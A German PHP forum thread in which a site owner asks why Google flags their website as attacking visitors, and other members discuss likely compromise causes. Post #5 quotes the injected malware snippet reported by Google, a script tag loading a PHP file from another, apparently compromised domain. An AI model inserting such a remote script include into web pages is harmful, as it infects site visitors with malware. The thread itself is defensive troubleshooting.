Ankündigung

Einklappen
Keine Ankündigung bisher.

Als attackierend gemeldete Webseite

Einklappen

Neue Werbung 2019

Einklappen
X
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

  • Als attackierend gemeldete Webseite

    Hallo php-Eingeweihte,
    vor meiner Webseite (besser Webseitenübung) warnt google mit der im Titel angegebenen Meldung.

    Der Host (Galaxy GmbH) schreibt in seiner Mail an mich:
    "
    Dear site owner or webmaster of hslmg.de,

    We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.

    Below is an example URL on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):

    http://hslmg. de/
    "

    Tatsächlich kommen in einigen meiner php-Dateien Kommentarzeilen mit URLs der eigenen Seite vor, z.B.

    <!-- Aufruf in Browserzeile: http://hslmg.de /KPK/Fotoshow.php?hat=my --> [Leerzeichen hinzugefügt]

    Ich hatte bisher Gefahren in Formularen gesehen. Auch in Kommentarzeilen?
    Herzliche Grüße
    phpdummy


  • #2
    Das passiert, wenn man unsere Ratschläge nicht befolgt

    Ne, Spass beiseite. Kommentarzeilen im HTML-Kontext sind ungefährlich. Wahrscheinlich sind deine PHP-Dateien verändert worden. Aber es liegen zu wenige Informationen vor um dazu etwas brauchbares sagen zu können.
    Standards - Best Practices - AwesomePHP - Guideline für WebApps

    Kommentar


    • #3
      Danke rkr,
      ich werde nie erfahren, was da war und bin dem Vorschlag von Galaxy "wir löschen den Account und Sie installieren alles nach gründlicher Prüfung neu." gefolgt.

      Inzwischen bin ich so weit, dass ich Dateien hochladen kann. Das Aufrufen der Seite führt aber weiter zur "Attacke"-Warnng und bei Plesk kann ich mich auch nicht einloggen. Vielleicht hilt ein paar Stunden warten.
      HG
      phpdummy

      Kommentar


      • #4
        Zitat von phpdummy Beitrag anzeigen
        ich werde nie erfahren, was da war und bin dem Vorschlag von Galaxy "wir löschen den Account und Sie installieren alles nach gründlicher Prüfung neu." gefolgt.
        Ich denke das interessiert dich spätesten nächste Woche wenn die Seite wieder gehackt wurde. Bei sowas musst du immer das wie abklären.

        Kommentar


        • #5
          Das Google-Webmaster-Tool liefert folgende Information (csv):
          Art des Sicherheitsproblems,URL,Datum,Beispiel-Snippet
          Malware-Code eingeschleust, http://hslmg.de/, 12.12.14, """<script type=""""text/javascript"""" src=""""http://www.grundschule-miltenberg.de/dngx93kz.php?id=2518024"""">"""

          Mein Beitrag künftig wird sein, weder php noch javascript zu verwenden. Aber ich weiß nicht einmal, ob es damit überhaupt etwas zu tun hat.

          Kommentar


          • #6
            http://www.grundschule-miltenberg.de ist deine domain? und die datei dngx93kz.php stammt augenscheinlich nicht von dir? seh ich das grad richtig?
            Current Projects: http://www.welten-buch.de, http://neu.zooadoo.de

            Kommentar


            • #7
              Nein, meine Domain ist hslmg.de. Inzwischen hat google die Attacken-Warnung auf meinen Antrag hin entfernt
              Ja, dngx93kz.php ist fremd.

              Kommentar


              • #8
                Entweder du hast eine Sicherheitslücke auf deiner Website oder der code wurde direkt eingebunden, indem zum beispiel dein Serverzugang ausgespäht wurde oder natürlich dein hoster wurde gehackt. Würde aber eher behaupten es liegt an 1 oder 2.
                Current Projects: http://www.welten-buch.de, http://neu.zooadoo.de

                Kommentar


                • #9
                  Vielleicht hast du (hoffentlich nicht) per include eine datei einer fremden webseite includiert?
                  Ansonsten hast du wohl irgendeine andere Sicherheitslücke bzw. gehabt. Falls sowas nochmal passiert würde ich auf jedenfall mit deinem Hoster in verbindung treten, auch wenn der Fehler vermutlich bei dir liegen wird.
                  Grüße
                  PS: Google zeigt die Grundschule Miltenberg domain übrigens auch als infected an.
                  Nützliches:

                  Kommentar


                  • #10
                    //OT:

                    Zitat von anghenfil Beitrag anzeigen
                    PS: Google zeigt die Grundschule Miltenberg domain übrigens auch als infected an.

                    In den letzen 90 Tagen haben wir 124 Seiten der Website überprüft. Dabei haben wir auf 20 Seite(n) festgestellt, dass Malware (schädliche Software) ohne Einwilligung des Nutzers heruntergeladen und installiert wurde. Der letzte Besuch von Google war am 2014-12-14. Verdächtiger Content wurde auf dieser Website zuletzt am 2014-11-19 gefunden.
                    In den letzten 90 Tagen hat grundschule-miltenberg.de scheinbar als Überträger für die Infizierung von 1 Website(s) fungiert, darunter
                    Nein. Diese Website hat in den letzten 90 Tagen keine Malware gehostet.
                    so richtig verstanden was google da will hab ich nicht...

                    Kommentar


                    • #11
                      Zitat von moma Beitrag anzeigen
                      so richtig verstanden was google da will hab ich nicht...
                      Das bedeutet einfach, dass auf der Seite ein externes bösartiges Script eingebunden wurde, also Überträger. Gibts ja genug Auswahl: Bsp:iframe, script, img
                      Windows Server gehören NICHT ins Internet!

                      Dildo? Dildo!

                      Kommentar


                      • #12
                        Theoretisch könntest du auch shardware auf deinem Rechner haben, welche sich dann (falls du ftp daten gespeichert hast) auf deinem Server breit gemacht hat. Glaube ich aber eher weniger.
                        Nützliches:

                        Kommentar


                        • #13
                          Zitat von phpdummy Beitrag anzeigen
                          Mein Beitrag künftig wird sein, weder php noch javascript zu verwenden. Aber ich weiß nicht einmal, ob es damit überhaupt etwas zu tun hat.
                          Javascript? Naja, das ist ja mal ein Plan! Oder hast du ein NodeJS am laufen?
                          Und doch: In den Händen eines Anfängers kann irgendwie alles zur Waffe werden
                          Standards - Best Practices - AwesomePHP - Guideline für WebApps

                          Kommentar


                          • #14
                            Zitat von rkr Beitrag anzeigen
                            Javascript? Naja, das ist ja mal ein Plan! Oder hast du ein NodeJS am laufen?
                            Und doch: In den Händen eines Anfängers kann irgendwie alles zur Waffe werden
                            Hallo rkr,
                            nachdem Wikipedia mir dein Bonmot erklärt hat, kann ich JS (ohne "Not") weiter verwenden.
                            Hast jedenfalls mit deiner impliziten Erklärung einen schönen Witz erzählt. Humor wird aber besser, wenn er auf eigene Kosten geht.
                            Herzliche Grüße
                            phpdummy

                            Kommentar


                            • #15
                              Zitat von moma Beitrag anzeigen
                              so richtig verstanden was google da will hab ich nicht...
                              Verbreiten und hosten...



                              Das Bild wird auf php.de verbreitet aber gehostet von wikimedia.org.

                              Kommentar

                              Lädt...
                              X